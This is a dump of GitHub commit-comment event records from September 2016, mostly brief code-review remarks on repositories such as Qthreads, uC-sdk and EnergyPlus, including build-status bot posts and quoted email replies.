{"id":"4511027859","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18887555,"position":15,"line":416,"path":"configure.ac","commit_id":"0ac41fda04165e93cc01c51ac0c261babef7d93d","created_at":"2016-09-02T22:35:52Z","updated_at":"2016-09-02T22:35:52Z","body":"@npe9 [This code] (https://github.com/Qthreads/qthreads/blob/0ac41fda04165e93cc01c51ac0c261babef7d93d/configure.ac#L416-L417) has an extra `]`\r\n\r\n```sh\r\nAS_IF([test \"x$enable_multinode\" = \"xyes\"],\r\n      ])\r\n```\r\n\r\nwhich for me causes ./configure to error with\r\n\r\n```\r\n./configure: line 3499: syntax error near unexpected token `fi'\r\n./configure: line 3499: `fi'\r\n```\r\n\r\nI'm not sure why this fails for me, and not for travis, but it seems like that line can just be removed anyways."}},"created_at":"2016-09-02T22:35:52Z"}
{"id":"4511030219","type":"CommitCommentEvent","actor":{"login":"tbrowder"},"repo":{"name":"perl6/perl6-most-wanted"},"payload":{"comment":{"id":18887562,"position":null,"line":null,"path":null,"commit_id":"cd3e1746b195b6206d7b2d9f89c9fba7c655ec88","created_at":"2016-09-02T22:36:40Z","updated_at":"2016-09-02T22:36:40Z","body":"deleted module is Test::Number::Delta"}},"created_at":"2016-09-02T22:36:40Z"}
{"id":"4511034421","type":"CommitCommentEvent","actor":{"login":"boundsj"},"repo":{"name":"mapbox/mapbox-gl-native"},"payload":{"comment":{"id":18887567,"position":4,"line":82,"path":"platform/ios/app/MBXViewController.m","commit_id":"52f23614b34728ffea2dc7c2920a2bf6375c9458","created_at":"2016-09-02T22:38:02Z","updated_at":"2016-09-02T22:38:02Z","body":"fyi @frederoni "}},"created_at":"2016-09-02T22:38:02Z"}
{"id":"4511036659","type":"CommitCommentEvent","actor":{"login":"ipdemes"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18887576,"position":null,"line":null,"path":null,"commit_id":"50d751cf3d0e5250817438bb0a5cdf89f806cb92","created_at":"2016-09-02T22:38:48Z","updated_at":"2016-09-02T22:38:48Z","body":"cool"}},"created_at":"2016-09-02T22:38:48Z"}
{"id":"4511037835","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18887581,"position":28,"line":43,"path":"ficbot.js","commit_id":"dc26500999dcabab16cad04fcec8bbca582224d1","created_at":"2016-09-02T22:39:13Z","updated_at":"2016-09-02T22:39:13Z","body":"Seems like \"associative array\" is the best term to use in JavaScript"}},"created_at":"2016-09-02T22:39:13Z"}
{"id":"4511038690","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18887582,"position":83,"line":80,"path":"ficbot.js","commit_id":"dc26500999dcabab16cad04fcec8bbca582224d1","created_at":"2016-09-02T22:39:30Z","updated_at":"2016-09-02T22:39:30Z","body":"Notice the replacements, specifically those for braces and backslashes, are performed before the `\\end{document}` command and front matter are joined with the text block."}},"created_at":"2016-09-02T22:39:30Z"}
{"id":"4511039824","type":"CommitCommentEvent","actor":{"login":"osmant"},"repo":{"name":"osmant/TFFDataPull"},"payload":{"comment":{"id":18887589,"position":50,"line":45,"path":"TFFDataPull/pipelines.py","commit_id":"808976a47642ae7ba22c135b9bd6a8bf8693e0c3","created_at":"2016-09-02T22:39:54Z","updated_at":"2016-09-02T22:39:54Z","body":"Bu kısmı iyi test ettin mi ?"}},"created_at":"2016-09-02T22:39:54Z"}
{"id":"4511048645","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":18887600,"position":null,"line":null,"path":null,"commit_id":"acdc299a9ca2bc6a0c912452972d9a0d0e2beaac","created_at":"2016-09-02T22:42:59Z","updated_at":"2016-09-02T22:42:59Z","body":"With 'root0' you want to block raspbian partition? as in my system (latest noobs version, raspbian+librelec) it is labeled as 'root'.\r\n\r\n```\r\nLibreELEC:~ # blkid\r\n/dev/mmcblk0: PTUUID=\"000476ea\" PTTYPE=\"dos\"\r\n/dev/mmcblk0p1: SEC_TYPE=\"msdos\" LABEL=\"RECOVERY\" UUID=\"6664-6431\" TYPE=\"vfat\" PARTUUID=\"000476ea-01\"\r\n/dev/mmcblk0p5: LABEL=\"SETTINGS\" UUID=\"5dfa925e-a6b9-4e51-8290-89c10e2b0c97\" TYPE=\"ext4\" PARTUUID=\"000476ea-05\"\r\n/dev/mmcblk0p6: SEC_TYPE=\"msdos\" LABEL=\"boot\" UUID=\"EAB8-CDB6\" TYPE=\"vfat\" PARTUUID=\"000476ea-06\"\r\n/dev/mmcblk0p7: LABEL=\"root\" UUID=\"70ffba00-c9cd-482b-950f-eef8eb3f3b4b\" TYPE=\"ext4\" PARTUUID=\"000476ea-07\"\r\n/dev/mmcblk0p8: SEC_TYPE=\"msdos\" UUID=\"0635-4D9C\" TYPE=\"vfat\" PARTUUID=\"000476ea-08\"\r\n/dev/mmcblk0p9: UUID=\"57cd9f93-23f4-4c88-8a58-389a2a291ea2\" TYPE=\"ext4\" PARTUUID=\"000476ea-09\"\r\n/dev/loop0: TYPE=\"squashfs\"\r\n```\r\n"}},"created_at":"2016-09-02T22:42:59Z"}
{"id":"4511052969","type":"CommitCommentEvent","actor":{"login":"Kakadu"},"repo":{"name":"orbifx/lablqt"},"payload":{"comment":{"id":18887610,"position":10,"line":16,"path":"lablqml/propMap_stubs.c","commit_id":"b88e99e24f2e6ac684cc980bf8ebd74d95b34f67","created_at":"2016-09-02T22:44:30Z","updated_at":"2016-09-02T22:44:30Z","body":"When I remove this line it doesn't crash. I think that you wanted to express something else there......"}},"created_at":"2016-09-02T22:44:30Z"}
{"id":"4511058907","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18887624,"position":8,"line":165,"path":"src/opencl/krb5pa-md5_kernel.cl","commit_id":"b755050c8a8f7777655d1a9d817400cadd407414","created_at":"2016-09-02T22:46:31Z","updated_at":"2016-09-02T22:46:31Z","body":"Wouldn't it be fair to credit the \"inventor\" of that trick? `git blame` on hashcat's source should provide enough details about the author. Otherwise, just credit hashcat in the comment (instead of just in the commit message)."}},"created_at":"2016-09-02T22:46:31Z"}
{"id":"4511058978","type":"CommitCommentEvent","actor":{"login":"mapkala"},"repo":{"name":"mapkala/neighborhoodmap"},"payload":{"comment":{"id":18887625,"position":null,"line":null,"path":null,"commit_id":"a4c1a8acbec5e8c0181173a071faf365364bf1d9","created_at":"2016-09-02T22:46:34Z","updated_at":"2016-09-02T22:46:34Z","body":"Solo ejemplo de buscador en index2.html"}},"created_at":"2016-09-02T22:46:34Z"}
{"id":"4511061409","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18887630,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T22:47:24Z","updated_at":"2016-09-02T22:47:24Z","body":"well done!"}},"created_at":"2016-09-02T22:47:24Z"}
{"id":"4511061749","type":"CommitCommentEvent","actor":{"login":"jackmott"},"repo":{"name":"jackmott/jackmott.github.io"},"payload":{"comment":{"id":18887631,"position":65,"line":368,"path":"_posts/2016-8-30-think-before-you-parallelize.markdown","commit_id":"b9f3882f1556135db6e4a28eb1f26da6a600fbaa","created_at":"2016-09-02T22:47:32Z","updated_at":"2016-09-02T22:47:32Z","body":"thanks, ill update the blog tonight.\n\nOn Sep 2, 2016 5:14 PM, \"Alex Burka\" <notifications@github.com> wrote:\n\n> Just so you know, 1.13.0-nightly doesn't nail it down since there's one\n> every night... the commit hash or the date will nail down the nightly\n> version.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jackmott/jackmott.github.io/commit/b9f3882f1556135db6e4a28eb1f26da6a600fbaa#commitcomment-18887426>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEe75ioBygD8tBiEr-e1x8eIRsVT1DU_ks5qmJ_KgaJpZM4J0IO2>\n> .\n>\n"}},"created_at":"2016-09-02T22:47:32Z"}
{"id":"4511065752","type":"CommitCommentEvent","actor":{"login":"gregoryforel"},"repo":{"name":"gregoryforel/DefinitelyTyped"},"payload":{"comment":{"id":18887642,"position":null,"line":null,"path":null,"commit_id":"588e6aaa469074ece86ec00bf211e404cc2e97b4","created_at":"2016-09-02T22:48:54Z","updated_at":"2016-09-02T22:48:54Z","body":"@danielrosenwasswer"}},"created_at":"2016-09-02T22:48:54Z"}
{"id":"4511066626","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887644,"position":4,"line":3,"path":"hardware/src/stm32f4xx/gpio.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:49:12Z","updated_at":"2016-09-02T22:49:12Z","body":"Nope, `\"\"`."}},"created_at":"2016-09-02T22:49:12Z"}
{"id":"4511068864","type":"CommitCommentEvent","actor":{"login":"kunallillaney"},"repo":{"name":"randalburns/randalburns.github.io"},"payload":{"comment":{"id":18887651,"position":2,"line":2,"path":"README.md","commit_id":"c6a7d9f99e73885141547e345a4eda14a16db3bc","created_at":"2016-09-02T22:49:57Z","updated_at":"2016-09-02T22:49:57Z","body":"@randalburns You are finally getting on the jekyll bandwagon 👍 \r\n[Here](https://github.com/jekyll/jekyll/wiki/themes) is a nice list of themes which might be useful."}},"created_at":"2016-09-02T22:49:57Z"}
{"id":"4511069021","type":"CommitCommentEvent","actor":{"login":"coatless"},"repo":{"name":"SMAC-Group/TTS"},"payload":{"comment":{"id":18887652,"position":3,"line":3,"path":"devel/02-stationarity.Rmd","commit_id":"b5b308c90f0868e2e4c0cf32e93805f190020c49","created_at":"2016-09-02T22:50:00Z","updated_at":"2016-09-02T22:50:00Z","body":"And a merge conflict!!!!"}},"created_at":"2016-09-02T22:50:00Z"}
{"id":"4511069349","type":"CommitCommentEvent","actor":{"login":"hamzaze"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18887654,"position":null,"line":null,"path":null,"commit_id":"8dd0cd2cb2ad6b91719957981a12fe56d3f098b9","created_at":"2016-09-02T22:50:09Z","updated_at":"2016-09-02T22:50:09Z","body":"Izgleda ! vise steti nego sto koristi, bolje je ??\nbrisat cu.\n\n\n2016-09-02 21:56 GMT+02:00 irfanG <notifications@github.com>:\n\n> meni ovo izgleda solidno, nemam komentara - jedino sto mi bode oci je\n>\n>     let photo1 = UIImage(named: \"meal1\")!\n>         let meal1 = Meal(name: \"Caprese Salad\", photo: photo1, rating: 4)!\n>\n>         let photo2 = UIImage(named: \"meal2\")!\n>         let meal2 = Meal(name: \"Chicken and Potatoes\", photo: photo2, rating: 5)!\n>\n>         let photo3 = UIImage(named: \"meal3\")!\n>         let meal3 = Meal(name: \"Pasta with Meatballs\", photo: photo3, rating: 3)!\n>\n>         meals += [meal1, meal2, meal3]\n>\n>\n> za ovaj primjer je ok, u realnom zivotu ovo je dosta rizicna konstrukcija\n>\n> i druga stvar, cisto zbog ljepseg koda da obrises onaj kod koji ne\n> koristis pogotovu onaj koji se automatski kreira prilikom kreiranja\n> controllera / viewa\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hamzaze/ios-journey/commit/8dd0cd2cb2ad6b91719957981a12fe56d3f098b9#commitcomment-18885719>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATHqxGKvDSZ58JR015rYN0AdzqqJa8LLks5qmH9qgaJpZM4J0CYx>\n> .\n>\n"}},"created_at":"2016-09-02T22:50:09Z"}
{"id":"4511072220","type":"CommitCommentEvent","actor":{"login":"Tpixelminer"},"repo":{"name":"Tpixelminer/Mineplex-Superpaintball-Texture-Pack"},"payload":{"comment":{"id":18887659,"position":null,"line":null,"path":null,"commit_id":"0a9fbcefbac1bc930813348dfb3a5eecf1040034","created_at":"2016-09-02T22:51:06Z","updated_at":"2016-09-02T22:51:06Z","body":"lol"}},"created_at":"2016-09-02T22:51:06Z"}
{"id":"4511073212","type":"CommitCommentEvent","actor":{"login":"schinns"},"repo":{"name":"schinns/javascript-basic-assessment-v2"},"payload":{"comment":{"id":18887663,"position":97,"line":96,"path":"assessment.js","commit_id":"156de577b3e9a08eea5b3c31d6a3f70eb16ea046","created_at":"2016-09-02T22:51:26Z","updated_at":"2016-09-02T22:51:26Z","body":"actual code:\r\n\r\nvar yes = jedi.slice(1,2)\r\nvar thirdJedi = yes[0];"}},"created_at":"2016-09-02T22:51:26Z"}
{"id":"4511074616","type":"CommitCommentEvent","actor":{"login":"henn"},"repo":{"name":"shwsun/hil"},"payload":{"comment":{"id":18887665,"position":12,"line":236,"path":"haas/cli.py","commit_id":"4345877d043d5f0a6b05111e57db01e5809cae0e","created_at":"2016-09-02T22:51:56Z","updated_at":"2016-09-02T22:51:56Z","body":"`==` is not equivalent to `is`.\r\n\r\nCheck out [this stackoverflow](https://stackoverflow.com/questions/1504717/why-does-comparing-strings-in-python-using-either-or-is-sometimes-produce)\r\n"}},"created_at":"2016-09-02T22:51:56Z"}
{"id":"4511077027","type":"CommitCommentEvent","actor":{"login":"BRAYANALEXISESCOBARGOMEZ"},"repo":{"name":"sistemasinformacionts/Excercises1"},"payload":{"comment":{"id":18887670,"position":8,"line":34,"path":"README.md","commit_id":"45fb62d7421b24f51e6535b0df7dd5b8dea357e4","created_at":"2016-09-02T22:52:44Z","updated_at":"2016-09-02T22:52:44Z","body":"GRUPO NUMERO 3 https://docs.google.com/document/d/134QTFFUyWRbJa0tIwMc_FpgUOQVRtvpdOHrlYcq_WQs/edit?usp=sharing"}},"created_at":"2016-09-02T22:52:44Z"}
{"id":"4511077238","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887671,"position":27,"line":27,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:52:48Z","updated_at":"2016-09-02T22:52:48Z","body":"+`static`"}},"created_at":"2016-09-02T22:52:48Z"}
{"id":"4511078063","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18887673,"position":null,"line":null,"path":null,"commit_id":"efaab1c2f0040b0363ccd8ee76ce4f6253a46e99","created_at":"2016-09-02T22:53:08Z","updated_at":"2016-09-02T22:53:08Z","body":"Oh nevermind, got it figured out (I think). :+1: "}},"created_at":"2016-09-02T22:53:08Z"}
{"id":"4511080307","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887678,"position":26,"line":26,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:53:56Z","updated_at":"2016-09-02T22:53:56Z","body":"`#define IRQ_MAX 16`"}},"created_at":"2016-09-02T22:53:56Z"}
{"id":"4511080854","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887681,"position":27,"line":27,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:54:09Z","updated_at":"2016-09-02T22:54:09Z","body":"`16` --> `IRQ_MAX`"}},"created_at":"2016-09-02T22:54:09Z"}
{"id":"4511082481","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887686,"position":28,"line":28,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:54:35Z","updated_at":"2016-09-02T22:54:35Z","body":"```\r\n__attribute__((constructor)) static void irq_init() {\r\n    int i;\r\n    for (i = 0; i < IRQ_MAX; i++) irq_line_callback = NULL;\r\n}\r\n```\r\n"}},"created_at":"2016-09-02T22:54:35Z"}
{"id":"4511083255","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887688,"position":29,"line":29,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:54:54Z","updated_at":"2016-09-02T22:54:54Z","body":"+`static`"}},"created_at":"2016-09-02T22:54:54Z"}
{"id":"4511083336","type":"CommitCommentEvent","actor":{"login":"npe9"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18887689,"position":15,"line":416,"path":"configure.ac","commit_id":"0ac41fda04165e93cc01c51ac0c261babef7d93d","created_at":"2016-09-02T22:54:54Z","updated_at":"2016-09-02T22:54:54Z","body":"Hey Elliot, it should be fixed. That test was a leftover of the runtime detection code that I missed.\r\n\r\nNoah\r\n\r\nFrom: Elliot Ronaghan <notifications@github.com>\r\nReply-To: Qthreads/qthreads <reply@reply.github.com>\r\nDate: Friday, September 2, 2016 at 4:35 PM\r\nTo: Qthreads/qthreads <qthreads@noreply.github.com>\r\nCc: Evans Noah <nevans@sandia.gov>, Mention <mention@noreply.github.com>\r\nSubject: [EXTERNAL] Re: [Qthreads/qthreads] Support Portals4 (0ac41fd)\r\n\r\n\r\n@npe9<https://github.com/npe9> This code<https://github.com/Qthreads/qthreads/blob/0ac41fda04165e93cc01c51ac0c261babef7d93d/configure.ac#L416-L417> has an extra ]\r\n\r\nAS_IF([test \"x$enable_multinode\" = \"xyes\"],\r\n\r\n      ])\r\n\r\nwhich for me causes ./configure to error with\r\n\r\n./configure: line 3499: syntax error near unexpected token `fi'\r\n\r\n./configure: line 3499: `fi'\r\n\r\nI'm not sure why this fails for me, and not for travis, but it seems like that line can just be removed anyways.\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/Qthreads/qthreads/commit/0ac41fda04165e93cc01c51ac0c261babef7d93d#commitcomment-18887555>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAEx63k7xJkGms5Wazql5CHOWIJsjv6Fks5qmKTIgaJpZM4J0I8P>.\r\n"}},"created_at":"2016-09-02T22:54:54Z"}
{"id":"4511084167","type":"CommitCommentEvent","actor":{"login":"zbagz"},"repo":{"name":"zbagz/mrjob"},"payload":{"comment":{"id":18887695,"position":null,"line":null,"path":null,"commit_id":"0657b25601cc2c3e4eb3f1a1057b2791dd56054d","created_at":"2016-09-02T22:55:13Z","updated_at":"2016-09-02T22:55:13Z","body":"Sometimes google api returns 3 digit imageVersion like: 1.0.11. This was causing an error with _DATAPROC_IMAGE_TO_HADOOP_VERSION[self._image_version])\r\n"}},"created_at":"2016-09-02T22:55:13Z"}
{"id":"4511085154","type":"CommitCommentEvent","actor":{"login":"banalg"},"repo":{"name":"dart-league/ng_bootstrap"},"payload":{"comment":{"id":18887699,"position":15,"line":57,"path":"lib/components/tabsx/tabsx.dart","commit_id":"c04dd43068260ad6cec9ba46981366020dbfde41","created_at":"2016-09-02T22:55:35Z","updated_at":"2016-09-02T22:55:35Z","body":"Hello, is there a reason to replace again _tabs.remove(tab)_ by _slice(tabs, index, 1)_ ?\r\nI proposed the pull request #23 which where accepted, but the folowing release there is a roll back... My code is buggy again now..."}},"created_at":"2016-09-02T22:55:35Z"}
{"id":"4511087332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887703,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T22:56:24Z","updated_at":"2016-09-02T22:56:24Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-02T22:56:24Z"}
{"id":"4511089490","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887708,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T22:57:12Z","updated_at":"2016-09-02T22:57:12Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T22:57:12Z"}
{"id":"4511091867","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18887717,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T22:58:03Z","updated_at":"2016-09-02T22:58:03Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T22:58:03Z"}
{"id":"4511093272","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887720,"position":28,"line":28,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:58:33Z","updated_at":"2016-09-02T22:58:33Z","body":"```\r\nstatic void call_callback(void (*callback)()) {\r\n    if (callback) {\r\n        callback();\r\n    }\r\n}\r\n```"}},"created_at":"2016-09-02T22:58:33Z"}
{"id":"4511095112","type":"CommitCommentEvent","actor":{"login":"teonbrooks"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":18887725,"position":58,"line":545,"path":"mne/viz/topomap.py","commit_id":"ddea6f14859f75f478c4f16e368bcc9b336c4fb9","created_at":"2016-09-02T22:59:12Z","updated_at":"2016-09-02T22:59:12Z","body":"@jaeilepp this API change is not listed in the changelog. recently updated mne on dev and my script crashed, and I didn't know why. could you add it to `whats_new` for v0.12?"}},"created_at":"2016-09-02T22:59:12Z"}
{"id":"4511095791","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887727,"position":31,"line":31,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:59:26Z","updated_at":"2016-09-02T22:59:26Z","body":"`call_callback(0);`"}},"created_at":"2016-09-02T22:59:26Z"}
{"id":"4511096072","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887730,"position":36,"line":36,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:59:34Z","updated_at":"2016-09-02T22:59:34Z","body":"+`static`"}},"created_at":"2016-09-02T22:59:34Z"}
{"id":"4511096810","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887731,"position":38,"line":38,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:59:49Z","updated_at":"2016-09-02T22:59:49Z","body":"`call_callback(1);`"}},"created_at":"2016-09-02T22:59:49Z"}
{"id":"4511097201","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887733,"position":43,"line":43,"path":"hardware/src/stm32f4xx/irq.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T22:59:57Z","updated_at":"2016-09-02T22:59:57Z","body":"etc..."}},"created_at":"2016-09-02T22:59:57Z"}
{"id":"4511100078","type":"CommitCommentEvent","actor":{"login":"castronetoo"},"repo":{"name":"castronetoo/BloodBrothers"},"payload":{"comment":{"id":18887738,"position":null,"line":null,"path":null,"commit_id":"a68acc0ab6b32da03069696022ace9d3fd6e8ce0","created_at":"2016-09-02T23:00:50Z","updated_at":"2016-09-02T23:00:50Z","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <meta charset=\"utf-8\">\r\n    <title>Doação</title>\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n    <!-- pra saber de onde a pessoa está acessando(PC, Celular), tamanho da tela do computador, -->\r\n    <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css\" integrity=\"sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7\" crossorigin=\"anonymous\">\r\n    <link rel=\"stylesheet\" href=\"index.css\">\r\n</head>\r\n<body>\r\n    <nav class=\"navbar navbar-default\">\r\n        <div class=\"container\">\r\n            <ul class=\"nav navbar-nav navbar-right\">\r\n                <li><a href=\"#\">Cadastro</a></li>\r\n\t\t\t\t<li><a href=\"#\">Campanhas ativas</a></li>\r\n\t\t\t\t<li><a href=\"#\">Login</a></li>\r\n                <li class=\"dropdown\">\r\n                    <a href=\"#\" class=\"dropdown-toggle\" data-toggle=\"dropdown\" role=\"button\" aria-haspopup=\"true\" aria-expanded=\"false\">Relatórios <span class=\"caret\"></span></a>\r\n\t\t\t\t\t\t<ul class=\"dropdown-menu\">\r\n                        <li><a href=\"#\">Doação</a></li>\r\n                        <li><a href=\"#\">Data de exame</a></li>\r\n                        <li><a href=\"#\">Eventos Cadastrados</a></li>\r\n                        <li role=\"separator\" class=\"divider\"></li>\r\n                        <li><a href=\"#\">Quadro Geral</a></li>\r\n                    </ul>\r\n                </li>\r\n\t\t\t\t\r\n            </ul>\r\n        </div>\r\n    </nav>\r\n\r\n   \r\n    <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js\"></script>\r\n    <script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js\" integrity=\"sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS\" crossorigin=\"anonymous\"></script>\r\n</body>\r\n</html>"}},"created_at":"2016-09-02T23:00:50Z"}
{"id":"4511100638","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887739,"position":15,"line":57,"path":"hardware/include/gpio.h","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:01:02Z","updated_at":"2016-09-02T23:01:02Z","body":"`af` --> enum ?"}},"created_at":"2016-09-02T23:01:02Z"}
{"id":"4511103702","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887748,"position":7,"line":7,"path":"examples/stm32f429discovery/button/button.c","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:02:00Z","updated_at":"2016-09-02T23:02:00Z","body":"debounce ?"}},"created_at":"2016-09-02T23:02:00Z"}
{"id":"4511105904","type":"CommitCommentEvent","actor":{"login":"nicolasnoble"},"repo":{"name":"grumpycoders/uC-sdk"},"payload":{"comment":{"id":18887752,"position":47,"line":47,"path":"examples/stm32f429discovery/button/Makefile","commit_id":"13f532b3babc3d8b6a5c2d81dd73c0104adb98c9","created_at":"2016-09-02T23:02:38Z","updated_at":"2016-09-02T23:02:38Z","body":"Nope."}},"created_at":"2016-09-02T23:02:38Z"}
